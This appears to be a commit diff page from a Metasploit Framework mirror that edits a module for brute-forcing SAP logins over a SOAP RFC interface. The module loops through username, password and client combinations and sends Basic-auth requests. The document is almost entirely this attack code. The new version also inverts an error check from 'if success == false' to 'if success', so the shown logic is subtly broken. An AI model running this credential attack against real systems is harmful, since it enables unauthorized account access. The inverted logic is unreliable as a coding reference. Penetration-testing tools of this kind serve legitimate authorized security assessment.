infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

made requested changes

unstable
nmonkee 2012-11-15 00:00:31 +00:00
parent 6b7b8f7265
commit 62f9766e63
1 changed files with 26 additions and 28 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

46
modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb
View File

@ -1,15 +1,15 @@
## ##
# This file is part of the Metasploit Framework and may be subject to # This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit # redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use. # Framework web site for more information on licensing and terms of use.
# http://metasploit.com/ # http://metasploit.com/framework/
## ##
## ##
# This module is based on, inspired by, or is a port of a plugin available in # This module is based on, inspired by, or is a port of a plugin available in
# the Onapsis Bizploit Opensource ERP Penetration Testing framework - # the Onapsis Bizploit Opensource ERP Penetration Testing framework -
# http://www.onapsis.com/research-free-solutions.php. # http://www.onapsis.com/research-free-solutions.php.
# Mariano Nuñez (the author of the Bizploit framework) helped me in my efforts # Mariano Nunez (the author of the Bizploit framework) helped me in my efforts
# in producing the Metasploit modules and was happy to share his knowledge and # in producing the Metasploit modules and was happy to share his knowledge and
# experience - a very cool guy. I'd also like to thank Chris John Riley, # experience - a very cool guy. I'd also like to thank Chris John Riley,
# Ian de Villiers and Joris van de Vis who have Beta tested the modules and # Ian de Villiers and Joris van de Vis who have Beta tested the modules and
@ -28,20 +28,20 @@ class Metasploit4 < Msf::Auxiliary
def initialize def initialize
super( super(
'Name' => 'SAP SOAP RFC Brute Forcer (via RFC_PING)', 'Name' => 'SAP SOAP RFC Brute Forcer (via RFC_PING)',
'Version' => '$Revision$',
'Description' => %q{ 'Description' => %q{
This module attempts to brute force the username | password via an RFC interface (over SOAP). This module attempts to brute force the username | password via an RFC
Default clients can be tested without needing to set a CLIENT. interface (over SOAP). Default clients can be tested without needing to set a
Common/Default user and password combinations can be tested without needing to set a USERNAME, PASSWORD, USER_FILE or PASS_FILE. CLIENT. Common/Default user and password combinations can be tested without needing
The default usernames and password combinations are stored in ./data/wordlists/sap_default.txt. to set a USERNAME, PASSWORD, USER_FILE or PASS_FILE. The default usernames and
password combinations are stored in ./data/wordlists/sap_default.txt.
}, },
'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com' ]], 'References' => [[ 'URL', 'http://labs.mwrinfosecurity.com/tools/2012/04/27/sap-metasploit-modules/' ]],
'Author' => [ 'Agnivesh Sathasivam','nmonkee' ], 'Author' => [ 'Agnivesh Sathasivam','nmonkee' ],
'License' => BSD_LICENSE 'License' => BSD_LICENSE
) )
register_options([ register_options([
OptEnum.new('CLIENT', [false, 'Client can be single (066), comma seperated list (000,001,066) or range (000-999)', '000,001,066']), OptString.new('CLIENT', [false, 'Client can be single (066), comma seperated list (000,001,066) or range (000-999)', '000,001,066']),
OptBool.new('DEFAULT_CRED',[false, 'Check using the defult password and username',true]), OptBool.new('DEFAULT_CRED',[false, 'Check using the defult password and username',true])
], self.class) ], self.class)
register_autofilter_ports([ 8000 ]) register_autofilter_ports([ 8000 ])
end end
@ -86,8 +86,8 @@ class Metasploit4 < Msf::Auxiliary
credentials.each do |u, p| credentials.each do |u, p|
client.each do |cli| client.each do |cli|
success = bruteforce(u, p, cli) success = bruteforce(u, p, cli)
if success == true if success
saptbl << [ datastore['RHOST'], datastore['RPORT'], cli, u, p] saptbl << [ rhost, rport, cli, u, p]
end end
end end
end end
@ -95,8 +95,8 @@ class Metasploit4 < Msf::Auxiliary
each_user_pass do |u, p| each_user_pass do |u, p|
client.each do |cli| client.each do |cli|
success = bruteforce(u, p, cli) success = bruteforce(u, p, cli)
if success == true if success
saptbl << [ datastore['RHOST'], datastore['RPORT'], cli, u, p] saptbl << [ rhost, rport, cli, u, p]
end end
end end
end end
@ -128,26 +128,24 @@ class Metasploit4 < Msf::Auxiliary
'Authorization' => 'Basic ' + user_pass, 'Authorization' => 'Basic ' + user_pass,
'Content-Type' => 'text/xml; charset=UTF-8'} 'Content-Type' => 'text/xml; charset=UTF-8'}
}, 45) }, 45)
if res.code == 401 if res and res.code == 401
success = false success = false
return success return success
elsif res.code == 500 elsif res and res.code == 500
response = res.body response = res.body
error.push(response.scan(%r{<faultstring>(.*?)</faultstring>})) error.push(response.scan(%r{<faultstring>(.*?)</faultstring>}))
error.push(response.scan(%r{<message>(.*?)</message>})) error.push(response.scan(%r{<message>(.*?)</message>}))
success = false success = false
elsif res.code == 200 elsif res and res.code == 200
success = true success = true
return success return success
elsif res.body =~ /Response/
#puts res
end end
if success == false if success
err = error.join().chomp err = error.join.chomp
print_error("#{datastore['RHOSTS']}:#{datastore['RPORT']} -#{err} - #{client}:#{username}:#{password}") print_error("[SAP] #{rhost}:#{rport} - #{err} - #{client}:#{username}:#{password}")
end end
rescue ::Rex::ConnectionError rescue ::Rex::ConnectionError
print_error("#{datastore['RHOST']}:#{datastore['RPORT']} - Unable to connect") print_error("[SAP] #{rhost}:#{rport} - Unable to connect")
return return
end end
end end